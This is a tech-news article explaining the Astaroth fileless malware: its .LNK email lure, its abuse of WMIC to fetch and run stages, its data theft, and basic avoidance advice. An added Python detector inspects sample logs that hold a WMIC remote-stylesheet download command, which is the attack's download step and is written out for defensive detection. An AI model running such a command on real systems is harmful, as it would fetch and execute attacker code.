Microsoft Warns of Hard-to-Spot Fileless Malware, “Astaroth”

Recently, Microsoft went into red alert after Windows came under attack from malware. The antagonist this time was a strain of fileless malware called Astaroth. We’ve covered fileless malware in the past, so be sure to study up if you’re not sure what that means. In essence, it’s when malware lives within the RAM of a computer rather than its filesystem, making it harder to detect.

Let’s explore why Microsoft is up in arms about Astaroth, as well as what you should do to protect yourself.

How Does Astaroth Spread?

Astaroth spreads by using an .LNK (Windows shortcut) file. The file is hosted on a website, and a link to that website is sent around in an email.

If someone clicks the link, the .LNK file runs in Windows and passes instructions to the Windows Management Instrumentation Command-line (WMIC) tool. Because WMIC is a genuine program within Windows itself, running it slips past the antivirus.

Astaroth then uses WMIC as cover, forcing it to download and run everything the malware needs to do its job. Once all the pieces have been assembled, the attack begins.

While Astaroth does download tools to do its job, they are all legitimate system tools that Windows uses natively. That makes it harder for an antivirus to detect, since the attack turns key Windows processes against the system itself. This is why it's called a "fileless" attack: no foreign files are downloaded and saved to disk.

This method of attack also belongs to a larger category: "Living-off-the-Land" attacks, so called because the malware isn't technically introducing any new agents into the system; it simply uses what is already there to download and execute the payload.
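The chain described above (shortcut, WMIC, download, execute) as a defender would look for it in process-creation telemetry. This is an added example, not code from the original article or from Microsoft; it runs over constructed Sysmon-style records and assumes the shell that opened the shortcut shows the shortcut path in its command line.

```python
import json
import re
# Constructed Sysmon-style process-creation records (JSON lines), not real
# telemetry. Assumption: the shell that opened the shortcut shows its path.
SAMPLE_LOG = r"""
{"pid": 4100, "ppid": 900, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"}
{"pid": 4212, "ppid": 4100, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c start C:\\Users\\u\\Downloads\\invoice.lnk"}
{"pid": 4230, "ppid": 4212, "image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "cmdline": "wmic os get /format:http://placeholder.invalid/s.xsl"}
{"pid": 4240, "ppid": 4230, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c next_stage.cmd"}
{"pid": 5001, "ppid": 1800, "image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "cmdline": "wmic logicaldisk get name,size"}
"""

URL_RE = re.compile(r"https?://", re.IGNORECASE)

def parse_events(log_text):
    """Parse JSON-lines records into a dict keyed by pid."""
    events = {}
    for line in log_text.splitlines():
        if line.strip():
            ev = json.loads(line)
            events[ev["pid"]] = ev
    return events

def ancestry(events, pid):
    """Yield the record for pid and each ancestor present in the log."""
    seen = set()
    while pid in events and pid not in seen:
        seen.add(pid)
        yield events[pid]
        pid = events[pid]["ppid"]

def is_wmic(ev):
    return ev["image"].lower().endswith("\\wmic.exe")

def detect(events):
    """Return sorted (pid, rule) pairs for the WMIC abuse patterns above."""
    alerts = []
    for ev in events.values():
        if is_wmic(ev):
            # WMIC told to fetch something remote: the download step.
            if URL_RE.search(ev["cmdline"]):
                alerts.append((ev["pid"], "wmic_remote_resource"))
            # WMIC reached through a process chain that opened a shortcut.
            if any(".lnk" in a["cmdline"].lower() for a in ancestry(events, ev["ppid"])):
                alerts.append((ev["pid"], "wmic_from_lnk"))
        parent = events.get(ev["ppid"])
        if parent is not None and is_wmic(parent):
            # WMIC launching a further program: the execute step.
            alerts.append((ev["pid"], "wmic_spawned_child"))
    return sorted(alerts)
```

The routine WMIC inventory query (pid 5001) produces no alert; only the shortcut-to-WMIC-to-download chain does.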

What Does Astaroth Do?

Astaroth's main goal is to harvest as much information as it can, and it does this in several ways. A keylogger records everything the user types, while the clipboard is scanned for sensitive information. Astaroth will also force apps to dump information about themselves.

This is generally how most malware acts these days. Viruses and malware have moved away from doing damage and instead perform actions that either harvest data or make money for the developers. Astaroth is a severe example of this, as its fileless installation and the many ways it harvests data make it a force to be reckoned with.

How to Avoid this Attack

Fortunately, while this tactic makes it hard for an antivirus to pick up on the attack, the initial vector is easy for a human to spot. Always be careful with links you click in emails, especially ones from senders you've never heard of before.

Fileless Foes

The stealthy nature of fileless malware makes it a serious threat, even for people with an antivirus installed. The latest Astaroth wave has shown just how devastating fileless malware can get. Now you know what it is, what it can do, and how to avoid an infection.

Does fileless malware worry you? Let us know below.

2 comments

  1. As Forrest Gump said, “Stupid is as stupid does.” How many times do people have to be told and shown that clicking willy-nilly on links in emails from senders they do not recognize is dangerous to the health of their computer???!!! If users used their heads for something other than a hat rack and practiced safe computing, most malware would die on the vine or spread ineffectively.

    Yes, the hackers that develop malware should be strung up by their toes but the inveterate, mindless clickers should join them by being strung up by their thumbs (or whatever digit they use to click their mouse).

    1. Just like @dragonmouth said, which is exactly what I keep telling people around me (who keep ignoring me), until they find themselves in such a situation and call me to get them unstuck from the “mud” they got into because of their arrogance.
